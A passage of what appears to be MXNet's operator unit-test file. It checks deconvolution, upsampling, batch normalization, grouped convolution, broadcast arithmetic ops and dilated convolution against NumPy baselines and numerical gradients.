adj = (101,101), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
pad = (1,1),
adj = (1,1),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5,5),
num_filter = 1,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28,28),
num_filter = 3,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403, 403),
num_filter = 3,
kernel = (7,7),
stride = (5,5),
pad = (2,2)
)
check_deconvolution_gradient(
input_shape = (1,3,5,5),
num_filter = 3,
pad = (1,1)
)
check_deconvolution_gradient(
input_shape = (5,3,100,100),
num_filter = 3,
pad = (3,3)
)
# 1D
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
target_shape = (8,),
pad = (99,), # will be ignored
adj = (101,), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
pad = (1,),
adj = (1,),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5),
num_filter = 1,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28),
num_filter = 3,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403),
num_filter = 3,
kernel = (7,),
stride = (5,),
pad = (2,)
)
check_deconvolution_gradient(
input_shape = (1,3,5),
num_filter = 3,
pad = (1,)
)
check_deconvolution_gradient(
input_shape = (5,3,100),
num_filter = 3,
pad = (3,)
)
def check_nearest_upsampling_with_shape(shapes, scale, root_scale):
arr = {'arg_%d'%i: mx.random.uniform(-10.0, 10.0, shape, ctx=mx.cpu()).copyto(default_context()) for i, shape in zip(range(len(shapes)), shapes)}
arr_grad = {'arg_%d'%i: mx.nd.zeros(shape) for i, shape in zip(range(len(shapes)), shapes)}
up = mx.sym.UpSampling(*[mx.sym.Variable('arg_%d'%i) for i in range(len(shapes))], sample_type='nearest', scale=root_scale)
exe = up.bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
exe.backward(exe.outputs)
for k in range(len(shapes)):
name = 'arg_%d'%k
assert_allclose(arr[name].asnumpy()*root_scale**2*scale**(2*k), arr_grad[name].asnumpy(), rtol=1e-4)
def check_bilinear_upsampling_with_shape(shapes, scale, root_scale):
arr = {'arg_%d'%i: mx.random.uniform(-10.0, 10.0, shape, ctx=mx.cpu()).copyto(default_context()) for i, shape in zip(range(len(shapes)), shapes)}
arr_grad = {'arg_%d'%i: mx.nd.zeros(shape) for i, shape in zip(range(len(shapes)), shapes)}
up = mx.sym.UpSampling(*[mx.sym.Variable('arg_%d'%i) for i in range(len(shapes))], sample_type='bilinear', scale=root_scale)
exe = up.bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
exe.backward(exe.outputs)
for k in range(len(shapes)):
name = 'arg_%d'%k
assert_allclose(arr[name].asnumpy()*root_scale**2*scale**(2*k), arr_grad[name].asnumpy(), rtol=1e-4)
@with_seed()
def test_nearest_upsampling():
for root_scale in [1,2,3]:
for scale in [1,2,3]:
for num_shape in [1,2,3]:
for base in [1,2,3]:
shapes = [(1,3,base*root_scale*scale**(num_shape-1-i),base*root_scale*scale**(num_shape-1-i)) for i in range(num_shape)]
check_nearest_upsampling_with_shape(shapes, scale, root_scale)
@with_seed()
def test_batchnorm_training():
def check_batchnorm_training(stype):
for shape in [(2, 3), (2, 3, 2, 2)]:
data_tmp = np.random.normal(-0.1, 0.1, size=shape)
s = shape[1],
gamma = np.ones(s)
beta = np.ones(s)
gamma[1] = 3
beta[0] = 3
rolling_mean = np.random.uniform(size=s)
rolling_std = np.random.uniform(size=s)
data = mx.symbol.Variable('data', stype=stype)
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
mean_std = [mx.nd.array(rolling_mean).tostype(stype), mx.nd.array(rolling_std).tostype(stype)]
test = mx.symbol.BatchNorm_v1(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
# Test varying channel axis
dim = len(shape)
for chaxis in range(-dim, dim):
chaxis_true = chaxis
if chaxis < 0:
chaxis_true = dim + chaxis
shapex = shape
channel_count = shapex[chaxis_true]
data_tmp = np.random.normal(-0.1, 0.1, size=shapex)
gamma = np.ones(channel_count)
beta = np.ones(channel_count)
if channel_count > 1:
gamma[1] = 3
beta[0] = 3
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
xrolling_mean = np.random.uniform(size=channel_count)
xrolling_std = np.random.uniform(size=channel_count)
xmean_std = [mx.nd.array(xrolling_mean).tostype(stype),
mx.nd.array(xrolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
check_batchnorm_training('default')
@with_seed()
def test_batchnorm():
momentum = 0.9
epsilon = 1e-5
def _test_batchnorm_impl(op, shape, axis, cudnn_off, output_mean_var):
print(str((op, shape, axis, cudnn_off)))
kwargs = dict(output_mean_var=output_mean_var)
if op == mx.nd.contrib.SyncBatchNorm:
if axis != 1:
return
key = str(op) + str(shape) + str(axis)
kwargs.update(dict(key=key))
if cudnn_off:
return
else:
kwargs.update(dict(axis=axis, cudnn_off=cudnn_off))
nch = shape[axis]
bn_gamma = mx.nd.random.uniform(shape=(nch,))
bn_gamma.attach_grad()
bn_beta = mx.nd.random.uniform(shape=(nch,))
bn_beta.attach_grad()
bn_running_mean = mx.nd.zeros(nch)
bn_running_var = mx.nd.ones(nch)
running_mean = mx.nd.zeros(nch)
running_var = mx.nd.ones(nch)
num_iters = 10
expand_shape = [1] * len(shape)
expand_shape[axis] = shape[axis]
for _ in range(num_iters):
data = mx.nd.random.uniform(shape=shape)
data.attach_grad()
ograd = mx.nd.random.uniform(shape=shape)
with mx.autograd.record():
output = op(data, bn_gamma, bn_beta,
bn_running_mean, bn_running_var,
momentum=momentum, eps=epsilon,
fix_gamma=False, **kwargs)
if output_mean_var:
output, output_mean, output_std = output
output.backward(ograd)
mx.nd.waitall()
data_mean = data.mean(
axis=axis, exclude=True, keepdims=True)
data_var = (data - data_mean).square().mean(axis=axis,
exclude=True,
keepdims=True)
target_output = (data - data_mean) / \
(data_var + epsilon).sqrt() * \
bn_gamma.reshape(expand_shape) + \
bn_beta.reshape(expand_shape)
# squeeze data_mean and data_var
data_mean_flat = data_mean.squeeze()
data_var_flat = data_var.squeeze()
running_mean = running_mean * momentum + \
data_mean_flat * (1 - momentum)
running_var = running_var * momentum + \
data_var_flat * (1 - momentum)
W = bn_gamma.reshape(expand_shape)
dnx = ograd * W
xsm = data - data_mean
nd = 1.0 / mx.nd.sqrt(data_var + epsilon)
nx = xsm * nd
m = np.prod(shape) / shape[axis]
dvar = (dnx * xsm).sum(axis=axis, keepdims=True,
exclude=True) * (-0.5) * mx.nd.power(nd, 3)
dmean = -nd * dnx.sum(axis=axis, keepdims=True, exclude=True) - \
dvar * xsm.mean(axis=axis, keepdims=True,
exclude=True) * 2.0
dX = dnx * nd + dvar * xsm * (2.0 / m) + dmean * (1.0 / m)
dW = (ograd * nx).sum(axis=axis, exclude=True)
db = ograd.sum(axis=axis, exclude=True)
atol = 1e-2
rtol = 1e-2
if output_mean_var:
assert_almost_equal(output_mean.asnumpy(),
data_mean_flat.asnumpy(),
atol=atol, rtol=rtol)
if op != mx.nd.contrib.SyncBatchNorm:
assert_almost_equal(output_std.asnumpy(),
(1.0 / (data_var_flat +
epsilon).sqrt()).asnumpy(),
atol=atol, rtol=rtol)
else:
assert_almost_equal(output_std.asnumpy(),
data_var_flat.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(output.asnumpy(), target_output.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(bn_running_mean.asnumpy(
), running_mean.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(bn_running_var.asnumpy(
), running_var.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(data.grad.asnumpy(),
dX.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(
bn_gamma.grad.asnumpy(), dW.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(
bn_beta.grad.asnumpy(), db.asnumpy(), atol=atol, rtol=rtol)
for op in [mx.nd.BatchNorm, mx.nd.contrib.SyncBatchNorm]:
for shape in [(24, 2), (24, 3, 4), (24, 4, 4, 4), (24, 5, 6, 4, 4)]:
for axis in range(len(shape)):
for cudnn_off in [False, True]:
for output_mean_var in [False, True]:
_test_batchnorm_impl(op, shape, axis,
cudnn_off, output_mean_var)
@with_seed()
def test_convolution_grouping():
for dim in [1, 2, 3]:
num_filter = 4
for num_group in [1, 2]:
kernel = (3,) * dim
shape = (1, 4) + (9,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group, kernel=kernel)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel)
for i in range(num_group)])
exe1 = y1.simple_bind(default_context(), x=shape)
exe2 = y2.simple_bind(default_context(), x=shape, w=(num_filter, shape[1]//num_group) + kernel, b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.float32(np.random.normal(size=arr1.shape))
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
np.testing.assert_allclose(arr1.asnumpy(), arr2.asnumpy(), rtol=1e-3, atol=1e-3)
@unittest.skip("Flaky test https://github.com/apache/incubator-mxnet/issues/14052")
@with_seed()
def test_depthwise_convolution():
for dim in [1,2]:
for num_base in [1, 4, 16, 32, 64]:
for kernel_x in [3, 5]:
for stride_x in [1, 2]:
for pad_x in [0, 1]:
for in_size in [7, 32]:
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
num_group = num_base
shape = (2, num_base) + (in_size,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group,
kernel=kernel, stride=stride, pad=pad)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel,
stride=stride, pad=pad)
for i in range(num_group)])
dev = default_context()
exe1 = y1.simple_bind(dev, x=shape)
exe2 = y2.simple_bind(dev, x=shape, w=(num_filter, shape[1]//num_group)+kernel,
b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.random.normal(size=arr1.shape)
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
np.testing.assert_allclose(arr1.asnumpy(), arr2.asnumpy(), rtol=1e-3, atol=1e-3)
def gen_broadcast_data(idx):
# Manually set test cases
binary_op_data_shape = np.array(
[[[2, 5, 1, 30, 7], [1, 5, 448, 30, 1]],
[[10, 49, 1, 77, 17], [10, 1, 2, 1, 17]],
[[13, 2, 65, 2, 1], [13, 1, 65, 1, 225]],
[[9, 434, 4, 2, 37], [9, 1, 4, 1, 37]],
[[2, 52, 1, 4, 1], [1, 52, 60, 1, 37]],
[[1, 23, 7, 122, 50], [2, 1, 7, 1, 50]],
[[1, 17, 1, 5, 1], [22, 1, 2, 1, 28]],
[[29, 1, 2, 1, 8], [29, 22, 1, 130, 1]],
[[2, 36, 1, 427, 3], [1, 36, 11, 427, 1]],
[[1, 2, 1, 100, 7], [1, 2, 448, 100, 1]],
[[1, 2, 495, 77, 7], [1, 2, 1, 1, 7]],
[[1, 43, 65, 2, 1], [1, 43, 65, 1, 225]],
[[1, 92, 434, 2, 2], [1, 92, 1, 2, 2]],
[[1, 92, 1, 4, 1], [1, 92, 134, 1, 17]],
[[1, 53, 2, 122, 143], [1, 1, 2, 1, 143]],
[[1, 179, 1, 87, 17], [1, 179, 1, 1, 17]],
[[1, 1, 17, 5, 1], [1, 22, 1, 1, 28]],
[[1, 2, 1, 1, 8], [1, 2, 52, 430, 1]],
[[1, 163, 1, 22, 3], [1, 163, 116, 22, 1]],
[[1, 1, 44, 30, 7], [1, 1, 44, 30, 1]],
[[1, 1, 1, 1, 28], [1, 127, 1, 5, 28]],
[[1, 2, 394, 38, 1], [1, 2, 394, 38, 16]],
[[1, 10, 49, 77, 17], [1, 1, 1, 1, 17]],
[[1, 431, 6, 2, 225], [1, 1, 6, 2, 225]],
[[1, 15, 1, 28, 1], [1, 15, 1, 28, 463]],
[[1, 129, 2, 48, 96], [1, 129, 2, 1, 1]],
[[1, 1, 403, 17, 2], [1, 44, 403, 17, 2]],
[[1, 1, 65, 2, 22], [1, 1, 65, 1, 1]],
[[1, 24, 103, 17, 18], [1, 24, 1, 1, 1]],
[[1, 1, 1, 1, 2], [1, 24, 194, 50, 1]],
[[1, 1, 107, 84, 9], [1, 1, 1, 1, 1]]])
if idx < binary_op_data_shape.shape[0]:
l_shape = binary_op_data_shape[idx][0]
r_shape = binary_op_data_shape[idx][1]
else:
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
l_same_dim = np.random.randint(0, 5)
r_same_dim = np.random.randint(0, 5)
l_axis_flags = np.random.randint(0, 2, size=ndim)
r_axis_flags = np.random.randint(0, 2, size=ndim)
if l_same_dim == 4:
l_axis_flags = np.ones(ndim)
if r_same_dim == 4:
r_axis_flags = np.ones(ndim)
l_shape = shape.copy()
r_shape = shape.copy()
l_shape[np.where(l_axis_flags == 0)] = 1
r_shape[np.where(r_axis_flags == 0)] = 1
return [np.random.random(l_shape), np.random.random(r_shape)]
def gen_broadcast_data_int(idx):
d = gen_broadcast_data(idx);
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def gen_binary_data(dummy):
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
#print("gen shape {}".format(shape))
return [np.random.random(shape), np.random.random(shape)]
def gen_binary_data_int(dummy):
d = gen_binary_data(dummy);
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def check_binary_op_forward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5, mx_nd_func=None):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
y = symbol.bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])})
y.forward(is_train=True)
y = y.outputs[0].asnumpy()
x = baseline(d[0], d[1]).astype(y.dtype)
#np.set_printoptions(precision=20)
a = d[0]
b = d[1]
#print("a: {} {}".format(a.dtype, a))
#print("a: {} {}".format(b.dtype, b))
#print("x: {} {}".format(x.dtype, x))
#print("y: {} {}".format(y.dtype, y))
if mx_nd_func is not None:
d0 = mx.nd.array(d[0], dtype=d[0].dtype)
d1 = mx.nd.array(d[1], dtype=d[1].dtype)
assert_almost_equal(y, mx_nd_func(d0, d1).asnumpy(), rtol=rtol, atol=atol)
idx = np.abs(x-y) > atol+rtol*np.abs(x)
if idx.any():
import binascii
np.set_printoptions(precision=20)
logging.error('found precision problem:')
d[0] = np.broadcast_to(d[0], x.shape)
d[1] = np.broadcast_to(d[1], x.shape)
logging.error('input a: {}'.format(d[0][idx]))
logging.error('input b: {}'.format(d[1][idx]))
logging.error("output x: {} {}".format(x.dtype, x))
logging.error("output y: {} {}".format(y.dtype, y))
def ftohex(xs):
import struct
return list(map(lambda x: binascii.hexlify(struct.pack('d', x)), xs.flatten()))
logging.error('output x in baseline(a, b): {}'.format(x[idx]))
logging.error('output y in symbol(a, b): {}'.format(y[idx]))
logging.error('output x in baseline(a,b) hex: {}'.format(ftohex(x[idx])))
logging.error('output y in symbol(a,b) hex: {}'.format(ftohex(y[idx])))
logging.error('input a hex: {}'.format(ftohex(d[0][idx])))
logging.error('input a hex: {}'.format(ftohex(d[1][idx])))
logging.error('diff: {}'.format(np.abs(x-y)[idx] - atol-rtol*np.abs(x)[idx]))
assert_allclose(y, x, rtol=rtol, atol=atol)
def check_binary_op_backward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
out = np.random.random((d[0] + d[1]).shape)
def reduce_op(shape, x):
if shape == x.shape:
return x
keepdims_shape = list(x.shape)
for i in range(len(shape)):
if x.shape[i] != shape[i]:
keepdims_shape[i] = 1
x = np.sum(x, axis=i).reshape(keepdims_shape)
return x
baseline_grad1, baseline_grad2 = baseline(out, d[0], d[1])
x_1 = reduce_op(d[0].shape, baseline_grad1)
x_2 = reduce_op(d[1].shape, baseline_grad2)
y_1 = mx.nd.empty(d[0].shape)
y_2 = mx.nd.empty(d[1].shape)
y = symbol.bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])},
args_grad=[y_1, y_2])
y.forward(is_train=True)
y.backward([mx.nd.array(out)])
assert_allclose(y_1.asnumpy(), x_1, rtol=rtol, atol=atol)
assert_allclose(y_2.asnumpy(), x_2, rtol=rtol, atol=atol)
@with_seed()
def test_binary_op():
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = a + b
check_binary_op_forward(c, lambda a, b: a + b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_binary_data)
def test_bminus(a, b):
c = a - b
check_binary_op_forward(c, lambda a, b: a - b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_binary_data)
def test_bmul(a, b):
c = a * b
check_binary_op_forward(c, lambda a, b: a * b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_binary_data)
def test_bdiv(a, b):
c = a / b
check_binary_op_forward(c, lambda a, b: a / b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_binary_data)
def test_bmod(a, b):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
#c = a % b
c = mx.sym.cast(a, dtype='float64') % mx.sym.cast(b, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
check_binary_op_forward(c, lambda a, b: np.float32(a) % np.float32(b), gen_binary_data, rtol=0, atol=0)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.cast(a, dtype='int32') % mx.sym.cast(b, dtype='int32')
check_binary_op_forward(c, lambda a, b: a % b, gen_binary_data_int)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data_int)
def test_bpow(a, b):
c = a ** b
check_binary_op_forward(c, lambda a, b: a ** b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_binary_data)
def test_bneq(a, b):
c = a != b
# '!=' is sensitive to the precision of the comparison. Force numpy to match mxnet's float32.
# Issue exposed with seed 1644387363
check_binary_op_forward(c, lambda a, b: (np.float32(a) != np.float32(b)).astype(a.dtype), gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bneq(a, b)
@with_seed()
def test_broadcast_binary_op():
def check_bmaxmin_gradient(test_sym, x, y, delta, rtol, atol):
"""This function ensures that checking the numerical gradient of
broadcast_max/min is not crossing the boundary y=x where there
is no gradient definition at those sigularities."""
x_max = np.max(x)
y = x_max + 2 * delta + np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
x_min = np.min(x)
y = x_min - 2 * delta - np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = mx.sym.broadcast_plus(a, b)
check_binary_op_forward(c, lambda a, b: a + b, gen_broadcast_data, mx_nd_func=mx.nd.add)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_broadcast_data)
def test_bminus(a, b):
c = mx.sym.broadcast_minus(a, b)
check_binary_op_forward(c, lambda a, b: a - b, gen_broadcast_data, mx_nd_func=mx.nd.subtract)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_broadcast_data)
def test_bmul(a, b):
c = mx.sym.broadcast_mul(a, b)
check_binary_op_forward(c, lambda a, b: a * b, gen_broadcast_data, mx_nd_func=mx.nd.multiply)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_broadcast_data)
def test_bdiv(a, b):
c = mx.sym.broadcast_div(a, b)
check_binary_op_forward(c, lambda a, b: a / b, gen_broadcast_data, mx_nd_func=mx.nd.divide)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_broadcast_data)
def test_bmod(a_, b_):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
a = mx.sym.cast(a_, dtype='float64')
b = mx.sym.cast(b_, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
c = mx.sym.broadcast_mod(a, b)
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data, atol=1, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.broadcast_mod(mx.sym.cast(a, dtype='int32'), mx.sym.cast(b, dtype='int32'))
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data_int, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bpow(a, b):
c = mx.sym.broadcast_power(a, b)
check_binary_op_forward(c, lambda a, b: a ** b, gen_broadcast_data, mx_nd_func=mx.nd.power)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_broadcast_data)
def test_bequal(a, b):
c = mx.sym.broadcast_equal(a, b)
check_binary_op_forward(c, lambda a, b: (a == b).astype(a.dtype), gen_broadcast_data_int,
mx_nd_func=mx.nd.equal)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bmax(a, b):
c = mx.sym.broadcast_maximum(a, b)
check_binary_op_forward(c, lambda x, y: np.maximum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.maximum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bmin(a, b):
c = mx.sym.broadcast_minimum(a, b)
check_binary_op_forward(c, lambda x, y: np.minimum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.minimum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_band(a, b):
c = mx.sym.broadcast_logical_and(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_and(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_and)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bor(a, b):
c = mx.sym.broadcast_logical_or(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_or(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_or)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bxor(a, b):
c = mx.sym.broadcast_logical_xor(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_xor(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_xor)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bequal(a, b)
test_bmax(a, b)
test_bmin(a, b)
test_band(a, b)
test_bor(a, b)
test_bxor(a, b)
@with_seed()
def test_run_convolution_dilated_impulse_response(dil=(1,1), kernel_shape=(3,3), verbose=False):
dim = len(dil)
assert(len(kernel_shape) == dim)
# Input for spike response
data_size = 33
data_shape = (1, 1) + (data_size,) * dim
center = (0,0) + (data_size // 2,) * dim
spike_imgs = np.zeros(shape=data_shape, dtype=np.float32)
spike_imgs[center] = 1.0
spike_img = mx.nd.array(spike_imgs)
spike_img2 = mx.nd.array(spike_imgs)
kernel_weights = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel_weights2 = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel = mx.symbol.Variable('kernel')
in_img = mx.symbol.Variable('input')
net = mx.symbol.Convolution(in_img, num_filter=1,kernel=kernel_shape, dilate=dil, no_bias="true", name='test_convolution')
net.list_arguments()
be = net.bind(default_context(), args={ 'input' : spike_img, 'test_convolution_weight' : kernel_weights},
args_grad={'input' : spike_img2, 'test_convolution_weight' : kernel_weights2 } )
be.forward(True)
out_o = be.outputs[0].asnumpy()
ndo = be.outputs[0]
out_grads = np.zeros(shape=be.outputs[0].shape, dtype=np.float32)
out_grads[center] = 1.0
out_grad = mx.nd.array(out_grads)
be.backward([out_grad])
vgrad = be.grad_arrays[0].asnumpy()
out = out_o.reshape(out_o.shape[2:])
nz_loc = np.nonzero(out)
assert_allclose(np.sum(out),np.prod(kernel_shape),atol=1e-5)
assert_allclose(np.sum(vgrad),np.prod(kernel_shape),atol=1e-5)
# Now check whether the input gradient was computed correctly
input_grad = mx.nd.array(vgrad)
be = net.bind(default_context(), args={ 'input' : input_grad, 'test_convolution_weight' : kernel_weights})
be.forward(True)
out_o = be.outputs[0].asnumpy()
assert_allclose(out_o[center],np.prod(kernel_shape),atol=1e-5)
rnd_kernel_s = np.random.uniform(low=0.0, high=1.0, size=tuple([1,1]+list(kernel_shape))).astype(np.float32)
